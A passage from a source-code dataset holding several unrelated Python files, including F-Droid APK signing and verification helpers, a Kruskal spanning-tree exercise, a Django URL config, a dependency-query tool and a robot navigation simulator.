gradle_line_matches):\n changed = True\n continue\n\n if opened == 0:\n o.write(line)\n\n if changed:\n logging.info(\"Cleaned build.gradle of keysigning configs at %s\" % path)\n\n for propfile in [\n 'project.properties',\n 'build.properties',\n 'default.properties',\n 'ant.properties', ]:\n if propfile in files:\n path = os.path.join(root, propfile)\n\n with open(path, \"r\", encoding='iso-8859-1') as o:\n lines = o.readlines()\n\n changed = False\n\n with open(path, \"w\", encoding='iso-8859-1') 
as o:\n for line in lines:\n if any(line.startswith(s) for s in ('key.store', 'key.alias')):\n changed = True\n continue\n\n o.write(line)\n\n if changed:\n logging.info(\"Cleaned %s of keysigning configs at %s\" % (propfile, path))\n\n\ndef set_FDroidPopen_env(build=None):\n '''\n set up the environment variables for the build environment\n\n There is only a weak standard, the variables used by gradle, so also set\n up the most commonly used environment variables for SDK and NDK. Also, if\n there is no locale set, this will set the locale (e.g. LANG) to en_US.UTF-8.\n '''\n global env, orig_path\n\n if env is None:\n env = os.environ\n orig_path = env['PATH']\n for n in ['ANDROID_HOME', 'ANDROID_SDK']:\n env[n] = config['sdk_path']\n for k, v in config['java_paths'].items():\n env['JAVA%s_HOME' % k] = v\n\n missinglocale = True\n for k, v in env.items():\n if k == 'LANG' and v != 'C':\n missinglocale = False\n elif k == 'LC_ALL':\n missinglocale = False\n if missinglocale:\n env['LANG'] = 'en_US.UTF-8'\n\n if build is not None:\n path = build.ndk_path()\n paths = orig_path.split(os.pathsep)\n if path not in paths:\n paths = [path] + paths\n env['PATH'] = os.pathsep.join(paths)\n for n in ['ANDROID_NDK', 'NDK', 'ANDROID_NDK_HOME']:\n env[n] = build.ndk_path()\n\n\ndef replace_config_vars(cmd, build):\n cmd = cmd.replace('$$SDK$$', config['sdk_path'])\n cmd = cmd.replace('$$NDK$$', build.ndk_path())\n cmd = cmd.replace('$$MVN3$$', config['mvn3'])\n cmd = cmd.replace('$$QT$$', config['qt_sdk_path'] or '')\n if build is not None:\n cmd = cmd.replace('$$COMMIT$$', build.commit)\n cmd = cmd.replace('$$VERSION$$', build.version)\n cmd = cmd.replace('$$VERCODE$$', build.vercode)\n return cmd\n\n\ndef place_srclib(root_dir, number, libpath):\n if not number:\n return\n relpath = os.path.relpath(libpath, root_dir)\n proppath = os.path.join(root_dir, 'project.properties')\n\n lines = []\n if os.path.isfile(proppath):\n with open(proppath, \"r\", encoding='iso-8859-1') as o:\n lines = o.readlines()\n\n with open(proppath, \"w\", encoding='iso-8859-1') as o:\n placed = False\n for line in lines:\n if line.startswith('android.library.reference.%d=' % number):\n o.write('android.library.reference.%d=%s\\n' % (number, relpath))\n placed = True\n else:\n o.write(line)\n if not placed:\n o.write('android.library.reference.%d=%s\\n' % (number, relpath))\n\napk_sigfile = re.compile(r'META-INF/[0-9A-Za-z]+\\.(SF|RSA|DSA|EC)')\n\n\ndef verify_apks(signed_apk, unsigned_apk, tmp_dir):\n \"\"\"Verify that two apks are the same\n\n One of the inputs is signed, the other is unsigned. 
The signature metadata\n is transferred from the signed to the unsigned apk, and then jarsigner is\n used to verify that the signature from the signed apk is also valid for\n the unsigned one.\n :param signed_apk: Path to a signed apk file\n :param unsigned_apk: Path to an unsigned apk file expected to match it\n :param tmp_dir: Path to directory for temporary files\n :returns: None if the verification is successful, otherwise a string\n describing what went wrong.\n \"\"\"\n with ZipFile(signed_apk) as signed_apk_as_zip:\n meta_inf_files = ['META-INF/MANIFEST.MF']\n for f in signed_apk_as_zip.namelist():\n if apk_sigfile.match(f):\n meta_inf_files.append(f)\n if len(meta_inf_files) < 3:\n return \"Signature files missing from {0}\".format(signed_apk)\n signed_apk_as_zip.extractall(tmp_dir, meta_inf_files)\n with ZipFile(unsigned_apk, mode='a') as unsigned_apk_as_zip:\n for meta_inf_file in meta_inf_files:\n unsigned_apk_as_zip.write(os.path.join(tmp_dir, meta_inf_file), arcname=meta_inf_file)\n\n if subprocess.call([config['jarsigner'], '-verify', unsigned_apk]) != 0:\n logging.info(\"...NOT verified - {0}\".format(signed_apk))\n return compare_apks(signed_apk, unsigned_apk, tmp_dir)\n logging.info(\"...successfully verified\")\n return None\n\napk_badchars = re.compile('''[/ :;'\"]''')\n\n\ndef compare_apks(apk1, apk2, tmp_dir):\n \"\"\"Compare two apks\n\n Returns None if the apk content is the same (apart from the signing key),\n otherwise a string describing what's different, or what went wrong when\n trying to do the comparison.\n \"\"\"\n\n apk1dir = os.path.join(tmp_dir, apk_badchars.sub('_', apk1[0:-4])) # trim .apk\n apk2dir = os.path.join(tmp_dir, apk_badchars.sub('_', apk2[0:-4])) # trim .apk\n for d in [apk1dir, apk2dir]:\n if os.path.exists(d):\n shutil.rmtree(d)\n os.mkdir(d)\n os.mkdir(os.path.join(d, 'jar-xf'))\n\n if subprocess.call(['jar', 'xf',\n os.path.abspath(apk1)],\n cwd=os.path.join(apk1dir, 'jar-xf')) != 0:\n return(\"Failed to unpack \" + apk1)\n if subprocess.call(['jar', 'xf',\n os.path.abspath(apk2)],\n cwd=os.path.join(apk2dir, 'jar-xf')) != 0:\n return(\"Failed to unpack \" + apk2)\n\n # try to find apktool in the path, if it hasn't been manually configured\n if 'apktool' not in config:\n tmp = find_command('apktool')\n if tmp is not None:\n config['apktool'] = tmp\n if 'apktool' in config:\n if subprocess.call([config['apktool'], 'd', os.path.abspath(apk1), '--output', 'apktool'],\n cwd=apk1dir) != 0:\n return(\"Failed to unpack \" + apk1)\n if subprocess.call([config['apktool'], 'd', os.path.abspath(apk2), '--output', 'apktool'],\n cwd=apk2dir) != 0:\n return(\"Failed to unpack \" + apk2)\n\n p = FDroidPopen(['diff', '-r', apk1dir, apk2dir], output=False)\n lines = p.output.splitlines()\n if len(lines) != 1 or 'META-INF' not in lines[0]:\n meld = find_command('meld')\n if meld is not None:\n p = FDroidPopen(['meld', apk1dir, apk2dir], output=False)\n return(\"Unexpected diff output - \" + p.output)\n\n # since everything verifies, delete the comparison to keep cruft down\n shutil.rmtree(apk1dir)\n shutil.rmtree(apk2dir)\n\n # If we get here, it seems like they're the same!\n return None\n\n\ndef find_command(command):\n '''find the full path of a command, or None if it can't be found in the PATH'''\n\n def is_exe(fpath):\n return os.path.isfile(fpath) and os.access(fpath, os.X_OK)\n\n fpath, fname = os.path.split(command)\n if fpath:\n if is_exe(command):\n return command\n else:\n for path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, command)\n if is_exe(exe_file):\n return exe_file\n\n return None\n\n\n
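# Illustrative results of find_command (hypothetical machine, not part of the original\n# module):\n#\n# >>> find_command('sh')\n# '/bin/sh'\n# >>> find_command('no-such-tool') is None\n# True\n\n\n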
def genpassword():\n '''generate a random password for when generating keys'''\n h = hashlib.sha256()\n h.update(os.urandom(16)) # salt\n h.update(socket.getfqdn().encode('utf-8'))\n passwd = base64.b64encode(h.digest()).strip()\n return passwd.decode('utf-8')\n\n\ndef genkeystore(localconfig):\n '''Generate a new key with random passwords and add it to new keystore'''\n logging.info('Generating a new key in \"' + localconfig['keystore'] + '\"...')\n keystoredir = os.path.dirname(localconfig['keystore'])\n if keystoredir is None or keystoredir == '':\n keystoredir = os.path.join(os.getcwd(), keystoredir)\n if not os.path.exists(keystoredir):\n os.makedirs(keystoredir, mode=0o700)\n\n write_password_file(\"keystorepass\", localconfig['keystorepass'])\n write_password_file(\"keypass\", localconfig['keypass'])\n p = FDroidPopen([config['keytool'], '-genkey',\n '-keystore', localconfig['keystore'],\n '-alias', localconfig['repo_keyalias'],\n '-keyalg', 'RSA', '-keysize', '4096',\n '-sigalg', 'SHA256withRSA',\n '-validity', '10000',\n '-storepass:file', config['keystorepassfile'],\n '-keypass:file', config['keypassfile'],\n '-dname', localconfig['keydname']])\n # TODO keypass should be sent via stdin\n if p.returncode != 0:\n raise BuildException(\"Failed to generate key\", p.output)\n os.chmod(localconfig['keystore'], 0o0600)\n # now show the lovely key that was just generated\n p = FDroidPopen([config['keytool'], '-list', '-v',\n '-keystore', localconfig['keystore'],\n '-alias', localconfig['repo_keyalias'],\n '-storepass:file', config['keystorepassfile']])\n logging.info(p.output.strip() + '\\n\\n')\n\n\ndef write_to_config(thisconfig, key, value=None):\n '''write a key/value to the local config.py'''\n if value is None:\n origkey = key + '_orig'\n value = thisconfig[origkey] if origkey in thisconfig else thisconfig[key]\n with open('config.py', 'r', encoding='utf8') as f:\n data = f.read()\n pattern = '\\n[\\s#]*' + key + '\\s*=\\s*\"[^\"]*\"'\n repl = '\\n' + key + ' = \"' + value + '\"'\n data = re.sub(pattern, repl, data)\n # if this key is not in the file, append it\n if not re.match('\\s*' + key + '\\s*=\\s*\"', data):\n data += repl\n # make sure the file ends with a newline\n if not data.endswith('\\n'):\n data += '\\n'\n with open('config.py', 'w', encoding='utf8') as f:\n f.writelines(data)\n\n\ndef parse_xml(path):\n return XMLElementTree.parse(path).getroot()\n\n\ndef string_is_integer(string):\n try:\n int(string)\n return True\n except ValueError:\n return False\n\n\ndef get_per_app_repos():\n '''per-app repos are dirs named with the packageName of a single app'''\n\n # Android packageNames are Java packages, they may contain uppercase or\n # lowercase letters ('A' through 'Z'), numbers, and underscores\n # ('_'). However, individual package name parts may only start with\n # letters. 
https://developer.android.com/guide/topics/manifest/manifest-element.html#package\n p = re.compile('^([a-zA-Z][a-zA-Z0-9_]*(\\\\.[a-zA-Z][a-zA-Z0-9_]*)*)?$')\n\n repos = []\n for root, dirs, files in os.walk(os.getcwd()):\n for d in dirs:\n print('checking', root, 'for', d)\n if d in ('archive', 'metadata', 'repo', 'srclibs', 'tmp'):\n # standard parts of an fdroid repo, so never packageNames\n continue\n elif p.match(d) \\\n and os.path.exists(os.path.join(d, 'fdroid', 'repo', 'index.jar')):\n repos.append(d)\n break\n return repos\n","repo_name":"touchao123/fdroidserver","sub_path":"fdroidserver/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":76518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44197863534","text":"import datetime\nimport os\n\n\ndef nothing_printer(*_, **__):\n pass\n\n\nclass BlankLogger:\n\n @staticmethod\n def write(msg):\n pass\n\n def __call__(self, msg):\n pass\n\n\nclass PrintToScreenAndFile:\n\n def __init__(self, output_filename):\n os.makedirs(os.path.dirname(output_filename), exist_ok=True)\n self.f = open(output_filename, \"w\")\n\n def __call__(self, msg):\n self.write(msg)\n\n def write(self, msg):\n self.f.write(msg + \"\\n\")\n self.f.flush()\n os.fsync(self.f.fileno())\n print(msg)\n\n\nclass DurationEstimator:\n\n def __init__(self, total_objects, context=\"\", window_length=None):\n self.total_objects = total_objects\n self.time_checks = [datetime.datetime.now(), None]\n self.object_checks = [0, None]\n self.context = context\n if self.context:\n self.context += \" \"\n if window_length is None:\n self.window_length = max(1, int(total_objects/1000))\n else:\n self.window_length = window_length\n\n def _do_estimate(self, objects_done, now):\n objects_done_in_window = objects_done - self.object_checks[0]\n if objects_done_in_window == 0:\n return \"Don't know\"\n time_in_window = now - self.time_checks[0]\n time_per_object = time_in_window / objects_done_in_window\n remaining_objects = self.total_objects - objects_done\n remaining_time = time_per_object * remaining_objects\n return now + remaining_time\n\n def _update_checks(self, objects_done, now):\n if objects_done == 0:\n return\n if objects_done % self.window_length == 0:\n if self.time_checks[1] is None:\n # First time we have self.window_length objects\n # update [1]\n self.time_checks[1] = now\n self.object_checks[1] = objects_done\n elif objects_done > self.object_checks[1]:\n # A later time through - shuffle\n self.time_checks[0] = self.time_checks[1]\n self.object_checks[0] = self.object_checks[1]\n self.time_checks[1] = now\n self.object_checks[1] = objects_done\n\n def estimate(self, objects_done):\n now = datetime.datetime.now()\n self._update_checks(objects_done, now)\n return self._do_estimate(objects_done, now)\n\n def print_estimate(self, objects_done, per_call_context=\"\"):\n out = f\"{self.context}[{objects_done}/{self.total_objects}] done. Est. 
finish: {self.estimate(objects_done)}.\"\n        if per_call_context:\n            out += f\" {per_call_context}.\"\n        print(out)\n\n    def print_estimate_if(self, objects_done, every, per_call_context=\"\"):\n        if objects_done % every == 0:\n            self.print_estimate(objects_done, per_call_context=per_call_context)\n\n\ndef sort_and_thin_probs(data, number_to_show: int):\n    # Data is assumed to be an iterable of two-tuples with a number (probability) as the 2nd entry\n    # Sort by highest first\n    # But trim to show only 'number_to_show' entries, with rest in 'Other'\n    # Useful as a prep step to displaying output from the identifier\n    res = []\n    else_prob = 0.0\n    interim = sorted(data, key=lambda y: y[1], reverse=True)\n    for ix, (name, prob) in enumerate(interim):\n        if ix < number_to_show:\n            res.append((name, \"%.1f%%\" % (100.0 * prob)))\n        else:\n            else_prob += prob\n    res.append((\"Other\", \"%.1f%%\" % (100.0 * else_prob)))\n    return res\n","repo_name":"Pcb21/hebeloma-project","sub_path":"hebident/hebident/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"32701796088","text":"import numpy as np\n\ndef compute_cost(X, y, theta):\n    m = X.shape[0]\n    hypo = np.dot(X, theta)\n    return np.sum(np.power(np.subtract(hypo, y), 2)) / 2 / m\n\ndef gradient_descent(X, y, theta, alpha, iter_count):\n    m = X.shape[0]\n    theta_count = theta.shape[0]\n    # print(X[:, 0].reshape(X.shape[0], 1))\n    theta_history = np.array([])\n    for i in range(iter_count):\n        hypo = np.dot(X, theta)\n        temp_theta = theta.copy()  # copy, so all components of theta update simultaneously\n        for j in range(theta_count):\n            cond = np.multiply(np.subtract(hypo, y), X[:, j].reshape(X.shape[0], 1))\n            temp_theta[j] = theta[j] - (alpha / m) * np.sum(cond)\n        theta = temp_theta\n        theta_history = np.append(theta_history, theta)\n    return theta, theta_history.reshape(-1, theta.shape[0])","repo_name":"atomellar/coursera-ml-python","sub_path":"ex1-linear-regression/c_math.py","file_name":"c_math.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"10573223871","text":"\"\"\"\n( Spanning tree ) p. 280\n\n- Given a single graph, [ includes every node ]\n- No cycles exist\n\n( Kruskal's algorithm ) p. 281~283\n- One of the 'minimum spanning tree algorithms'\n- Can connect all nodes at [ the lowest cost ] \n- Classified as a greedy algorithm\n\n(Method)\n- Perform an 'ascending sort' on all edges\n- Starting from the shortest 'edge', add edges to the set\n- An 'edge' that would create a cycle is not added to the set\n\n( Algorithm )\n 1. Sort the edge data [ in ascending order ] by cost.\n \n 2. Examine the edges one by one and check whether 'the current edge' creates a cycle.\n   (1). [ If no cycle is created ], [ include it ] in the minimum spanning tree.\n   (2). [ If a cycle is created ], [ do not include it ] in the minimum spanning tree.\n 3. Repeat (the process of step 2) for every edge.\n\n- In the end, the number of edges included in the spanning tree equals 'the number of nodes - 1'\nex) If the number of nodes is 7 --> the [ number of edges included in the spanning tree ] is '6'. 
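\n\n( Worked example, added for illustration; not from the textbook )\n- With v=3 nodes and the edges (1,2) of cost 3, (1,3) of cost 1 and (2,3) of cost 2,\n  sorting yields the (cost, a, b) tuples [(1, 1, 3), (2, 2, 3), (3, 1, 2)].\n- Edges 1-3 and 2-3 are accepted (total cost 3); edge 1-2 is skipped because its two\n  endpoints already share a root, i.e. it would close a cycle.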
\n \n\"\"\"\n\n# 책 정답 10-5.py (p, 288~289 )\n# 특정 원소가 속한 집합을 찾기\ndef find_parent(parent, x):\n # 루트 노드가 아니라면, [ 루트 노드를 찾을 때까지 ] '재귀적'으로 호출\n if parent[x] != x:\n parent[x] = find_parent(parent, parent[x])\n return parent[x]\n\n# 두 원소가 [ 속한 집합 ]을 '합치기' --> 큰 번호를 갖는 노드를 [ 작은 번호 노드로 ] 부모 변경.\ndef union_parent(parent, a, b):\n a = find_parent(parent, a)\n b = find_parent(parent, b)\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\n# [ 노드의 개수 ]와 [ 간선(Union 연산)의 개수 ] 입력 받기\nv, e = map(int, input().split())\nparent = [0] * (v + 1) # [ 부모 테이블 초기화 ]하기\n\n# 모든 [ 간선을 담을 리스트 ]와, [ 최종 비용을 담을 ] 변수\nedges = []\nresult = 0\n\n# 부모 테이블상에서, 부모를 [ 자기 자신으로 ] 초기화\nfor i in range(1, v + 1):\n parent[i] = i\n\n# [ 모든 '간선'에 대한 정보 ]를 입력 받기\nfor _ in range(e):\n a, b, cost = map(int, input().split())\n # [ ** 비용순으로 정렬 ** ]하기 위해서 ' 튜플의 첫 번째 원소를 비용 '으로 설정\n edges.append((cost, a, b))\n\n# '간선'�� [ 비용순으로 정렬( 오름 차순 ) ]\nedges.sort()\n\n# 간선을 하나씩 확인하며\nfor edge in edges:\n cost, a, b = edge # 비용, 간선을 옆 변수에 저장.\n \n # [ 사이클이 발생하지 않는 경우 ]에만 집합에 포함\n if find_parent(parent, a) != find_parent(parent, b):\n union_parent(parent, a, b)\n result += cost # [ 최종 비용에 ] 추가로 더함.\n \nprint(\"최소 신장 트리를 만드는데 필요한 비용 :\" + str(result))\n\n# 부모 테이블 내용 출력하기\nprint('부모 테이블: ', end='')\nfor i in range(1, v + 1):\n print(parent[i], end=' ')","repo_name":"heeya15/PythonCodingTest","sub_path":"10_그래프 이론/(10-5)크루스칼 알고리즘.py","file_name":"(10-5)크루스칼 알고리즘.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2178503336","text":"from django.urls import path, include\nfrom . import views\n\n\nurlpatterns = [\n path(\"\", views.main, name = \"main\"),\n path(\"login\", views.userAuth, name = \"login\"),\n path(\"home\", views.home, name = \"home\" ),\n path(\"logout\", views.user_logout, name = \"logout\"),\n path(\"pao/\", include(\"pao.urls\")),\n path(\"oopk/\", include(\"oopk.urls\"))\n \n] ","repo_name":"hyxp3r/paosystem_new","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21053453237","text":"import os\nfrom source_hunter.result import Result\nfrom source_hunter.utils.log_utils import logger\n\n\nclass Query:\n def __init__(self, deps_tree):\n \"\"\"\n :param deps_tree: deps_tree obj\n \"\"\"\n self.deps_tree = deps_tree\n\n def _find_caller_query_helper(self, module_path, class_or_func, seen, result):\n callee_fnode = self.deps_tree.path_fnode_dict.get(module_path, None)\n if callee_fnode and callee_fnode not in seen:\n seen.add(callee_fnode)\n for caller_fnode in callee_fnode.parents:\n calling_items = caller_fnode.get_caller(class_or_func)\n if calling_items:\n result.add_calling_relation(callee_fnode, caller_fnode)\n for calling_item in calling_items:\n self._find_caller_query_helper(caller_fnode.file_path, calling_item, seen, result)\n return result\n\n def find_caller(self, module_path, class_or_func):\n result = Result(self.deps_tree.root_path)\n return self._find_caller(module_path, class_or_func, result)\n\n def _find_caller(self, module_path, class_or_func, result=None):\n if not result:\n result = Result(self.deps_tree.root_path)\n self._find_caller_query_helper(module_path, class_or_func, set(), result)\n logger.info('result contains {} relationship'.format(len(result.relationship)))\n return result\n\n def find_deps(self, module_path, class_or_func):\n result = 
\n    def find_deps(self, module_path, class_or_func):\n        result = Result(self.deps_tree.root_path)\n        return self._find_deps(module_path, class_or_func, result)\n\n    def _find_deps(self, module_path, class_or_func, result=None):\n        if not result:\n            result = Result(self.deps_tree.root_path)\n        start_fnode = self.deps_tree.path_fnode_dict.get(module_path, None)\n        if start_fnode:\n            stack = []\n            for dep in start_fnode.get_deps(class_or_func):\n                stack.append((dep, start_fnode))\n            while stack:\n                dep, caller_fnode = stack.pop()\n                dep_fnode = self.deps_tree.finder.fnode_by_import(dep, caller_fnode.dir_path)\n                if dep_fnode:\n                    result.add_calling_relation(dep_fnode, caller_fnode)\n                    module_name = os.path.basename(dep_fnode.file_path).split('.')[0]\n                    dep_name_idx = dep.find(module_name)\n                    if dep_name_idx > 0:\n                        dep_class_or_func = dep[dep_name_idx + len(module_name):]\n                        if dep_class_or_func.startswith('.'):\n                            dep_class_or_func = dep_class_or_func[1:]\n                        for dep in dep_fnode.get_deps(dep_class_or_func):\n                            stack.append((dep, dep_fnode))\n        return result\n\n    def find_caller_and_deps(self, module_path, class_or_func):\n        result = Result(self.deps_tree.root_path)\n        self._find_deps(module_path, class_or_func, result)\n        self._find_caller(module_path, class_or_func, result)\n        return result\n","repo_name":"pyeprog/source_hunter","sub_path":"source_hunter/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"7437178960","text":"\"\"\"\nMake a simple simulator that uses particles\n\"\"\"\nimport sys; import os; sys.path.append(os.getcwd())\nimport os\nfrom particles import Particles\nimport cv2\nfrom cv2 import VideoWriter, VideoWriter_fourcc\nimport numpy as np\nfrom labels import label2color\nfrom rslang_utils import pose2pixel, point, pixel2pose, to_onehot, to_onehot_array\nimport click\nfrom os.path import join, basename, dirname\nfrom lut import LUT\nfrom rslang_utils import numify, resize50, to_array, show, angle_between, round_angle, l2\nimport json\nfrom constants import MazeConstants as MC, MotionModel as MM, EpisodeConstants as EC, Files\nfrom functools import lru_cache\nfrom labels import COLORS, color2label, LABELS\nimport random\nfrom skimage.draw import line\nfrom constants import Action\nfrom floyd_warshall import FloydWarshallRobotslang\n\n# Colors in BGR format\nWHITE = (255, 255, 255)\nRED = ( 0, 0, 255)\nBLUE = (255, 0, 0)\nGREEN = ( 0, 255, 0)\n\n@lru_cache()\ndef get_targets(fname=Files.basedir + '/lookup_scans.json'):\n    with open(fname, 'r') as f:\n        out = json.load(f)\n    return out\n\nclass RobotSlangSimulator:\n\n    def __init__(self, scanId, show_rays=True, show_grid=True): \n        self.scanId = scanId\n        self.root, self.target, agent_pose, goal_pose = scanId.split('-')\n        self.root = os.path.join(Files.basedir, dirname(self.root))\n        self.agent_pose_ini = to_array(agent_pose)\n        self.goal_pose_ini = to_array(goal_pose)\n        \n        # Cache variables\n        self.pmc_var = None\n        # Visualization settings\n        self.show_rays = show_rays\n        self.show_grid = show_grid \n        \n        # Floyd-Warshall algorithm for shortest path supervision\n        self.mapfile_var = join(self.root, Files.objfile)\n        self.planner = FloydWarshallRobotslang(self.mapfile_var)\n        \n        # Navigation pixels for visualization\n        self.nav_pixels = self.planner.navigable_pixels\n\n        ## Target poses\n        self.target_poses = get_targets()[scanId]\n        self.target_pixels = pose2pixel(np.asarray(self.target_poses), MC.mazeshape)\n        self.target_pixels = list(zip([\"jar\", \"mug\", \"paddle\"], self.target_pixels))\n
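\n        # The agent and the goal are each represented by a single Particles instance holding\n        # an (x, y, heading) pose; reset() below snaps both onto the planner's discrete grid\n        # of navigable nodes via cnl().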
\n        # Randomize location of agent and goal\n        self.agent = Particles(1)\n        self.goal = Particles(1)\n\n        # Start by resetting\n        self.reset()\n\n    @property\n    def pmc(self):\n        if self.pmc_var is None:\n            obj_map = join(self.root, Files.objfile) \n            self.pmc_var = LUT(obj_map)\n        return self.pmc_var\n\n    @property\n    def mapfile(self):\n        if type(self.mapfile_var) == str:\n            self.mapfile_var = cv2.imread(self.mapfile_var)\n        return self.mapfile_var\n\n    def face_object(self):\n        \"\"\"Start trials facing the target object\"\"\"\n        self.step_counter = -1\n        \n        # Move away from starting pose / object\n        for i in range(20):\n            action = self.next_shortest_path_action()\n            self.makeActions(action)\n        self.agent.pose = self.cnl(self.agent.pose)\n        \n        # Find starting object pose\n        ndx = 0 if self.target == 'mug' else 1\n        back_to = self.target_poses[ndx]\n\n        # Face starting object \n        while l2(back_to, self.agent.pose) >= 3*MM.R:\n            action = self.next_shortest_path_action(self.agent.pose, back_to) \n            self.makeActions(action)\n        self.agent.pose = self.cnl(self.agent.pose)\n        \n    def reset(self):\n        self.goal.pose[ ...,:2] = self.goal_pose_ini\n        self.goal.pose[:] = self.cnl(self.goal.pose)\n        \n        # Set poses\n        if self.target == 'jar':\n            self.agent.pose[:] = self.agent_pose_ini[:]\n            self.agent.pose[:] = self.cnl(self.agent.pose)\n        else:\n            self.agent.pose[...,:2] = self.agent_pose_ini\n            self.agent.pose[:] = self.cnl(self.agent.pose)\n            self.face_object()\n        \n        # Reinit the step counter\n        self.step_counter = -1\n        \n    def cnl(self, pose):\n        \"\"\"Closest navigable location according to the chosen discretization\"\"\"\n        pose[:,:2] = self.planner.closest_node_pose(pose)\n        if pose.shape[-1] == 3:\n            pose[:,2] = round_angle(pose[:,2], MM.T)\n        return pose\n    \n    def check_collision(self):\n        R = self.getR()\n        new_pose = self.agent.next_pose(R, 0)\n        collision = self.planner.get_top_dist(self.agent.pose, new_pose)\n        collision = collision > .11 # if not a side or hypotenuse away \n        return collision\n\n    def draw_circle(self, viz, px, rad=MC.ORAD, color=BLUE):\n        cv2.circle(viz, point(px), rad, tuple([int(c) for c in color]), thickness=-1)\n        return viz\n\n    def display(self, viz=None, draw_measurements=False):\n        # Draw agent\n        viz = self.mapfile.copy() if viz is None else viz.copy()\n        \n        # Draw the navigable locations\n        if self.show_grid:\n            for p in self.nav_pixels:\n                self.draw_circle(viz, p, rad=5, color=(128, 128, 0))\n        \n        # Draw rays cast from the agent\n        if self.show_rays:\n            self.draw_rays(viz, self.agent.pose)\n        \n        # Draw the orientation\n        self.draw_orientation(viz, self.agent.pose)\n        \n        # Draw the agent\n        self.draw_agent(viz, self.agent.pose)\n        \n        # Draw the trajectory\n        traj = self.planner(self.agent.pose, self.goal.pose)\n        self.draw_trajectory(viz, traj)\n        \n        if draw_measurements:\n            # Add visualization lines\n            colors, depths = self.draw_measurement_lines()\n            # Resize for visualization\n            itype = cv2.INTER_NEAREST\n            colors = cv2.resize(colors, (viz.shape[1], 100), interpolation=itype)\n            depths = cv2.resize(depths, (viz.shape[1], 100), interpolation=itype)\n            viz = np.concatenate((viz, colors, colors * 0, depths), 0)\n\n        return viz\n\n    def draw_agent(self, viz, pose):\n        stp, enp = self.orientation_vector(pose)\n        st_pix = pose2pixel(stp, viz.shape)\n        self.draw_circle(viz, st_pix, rad=MC.PRAD*2, color=BLUE)\n\n    def orientation_vector(self, pose, r=.03):\n        stp = np.squeeze(pose)\n        enp = stp[:2] + r * np.asarray([np.cos(stp[2]), np.sin(stp[2])])\n        return stp, enp\n    \n    def draw_orientation(self, viz, pose, thickness=10): \n        # Start and end pose for arrow\n        stp, 
enp = self.orientation_vector(pose)\n\n # Convert to pixel\n st_pix = pose2pixel(stp, viz.shape)\n en_pix = pose2pixel(enp, viz.shape)\n \n # Draw orientation\n cv2.arrowedLine(viz, point(st_pix), point(en_pix), GREEN, thickness=thickness)\n return viz\n \n def draw_rays(self, viz, pose):\n stp, enp = self.orientation_vector(pose)\n st_pix = pose2pixel(stp, viz.shape)\n out = self.pmc.get_rays(pose)\n for o in out:\n cv2.line(viz, point(st_pix), point(o), WHITE, thickness=4)\n return viz\n\n def draw_measurement_lines(self):\n # Add measurement below\n color = self.get_visual_obs(self.agent.pose)\n measurement = np.expand_dims(color, 0)\n measurement = label2color(measurement)\n\n depth = self.get_depth_obs(self.agent.pose)\n depth /= max(depth.max(), 1e-12)\n depth = depth.reshape(1,-1, 1)\n cvec = 255*np.ones((1, color.shape[0], 3))\n cvec = np.uint8(255 - depth * cvec)\n\n return measurement, cvec\n\n def get_input(self):\n c = click.getchar()\n if c == '\\x1b[A': #forward\n action = Action.FORWARD\n elif c == '\\x1b[C': #left\n action = Action.LEFT\n elif c == '\\x1b[D': #right\n action = Action.RIGHT\n else:\n print(\"Not supported\")\n action = 3\n #elif c == '\\x1b[B': #backward\n # action = Action.BACKWARD\n\n return action\n \n def play(self):\n while True:\n show(self.display(draw_measurements=True), 30)\n action = self.get_input()\n self.makeActions(action)\n\n \n def getR(self):\n # Hypotenuse or straight motion\n degrees = np.abs(np.degrees(self.agent.pose[:,2]) - np.asarray([0, 90, 180, 270, 360]))\n \n if degrees.min() < 1 : \n R = MM.R\n else:\n R = MM.R * np.sqrt(2)\n return R\n \n #def next_shortest_path_action(self):\n # \"\"\"RANDOM BASELINE\"\"\"\n # if self.step_counter < 119:\n # if not self.check_collision():\n # action = random.sample([Action.FORWARD, Action.LEFT, Action.RIGHT], 1)[0]\n # else:\n # action = random.sample([Action.LEFT, Action.RIGHT], 1)[0]\n # return action\n # else:\n # return Action.END \n \n def next_shortest_path_action(self, pose1=None, pose2=None):\n \"\"\"teacher action\"\"\"\n if pose1 is None:\n pose1 = self.agent.pose\n if pose2 is None:\n pose2 = self.goal.pose\n next_node = self.planner.next_node(pose1, pose2)\n if next_node.sum() > 0:\n action = self.get_action(next_node)\n return action \n else:\n return Action.END \n \n def get_action(self, next_node):\n \n if self.step_counter < EC.max_len:\n stp, enp = self.orientation_vector(self.agent.pose)\n angle = angle_between(next_node - stp[:2], enp - stp[:2])\n \n if np.abs(angle) < np.radians(1):\n action = Action.FORWARD\n elif np.sign(angle) == 1:\n action = Action.LEFT\n else:\n action = Action.RIGHT\n else:\n # End the episode after step counter threshold passed\n action = Action.END\n\n return action\n \n def makeActions(self, action):\n self.step_counter += 1\n R = self.getR()\n\n if action == Action.FORWARD: # Forward\n dr = R\n da = 0\n elif action == Action.RIGHT: # Right\n dr = 0\n da = MM.T\n elif action == Action.LEFT: # Left\n dr = 0\n da = -MM.T \n else:\n dr = da = 0\n \n # move the agent\n self.agent.move(dr, da)\n self.agent.pose[:] = self.cnl(self.agent.pose)\n \n #self.visualize_every_episode()\n \n def get_visual_obs(self, pose):\n colors = self.pmc[pose]\n return colors\n \n def get_depth_obs(self, pose):\n rays = self.pmc.get_rays(pose)\n agent = self.agent.pose[:,:2]\n poses = pixel2pose(rays, MC.mazeshape)\n dists = np.linalg.norm(agent-poses, axis=1)\n return dists \n \n def 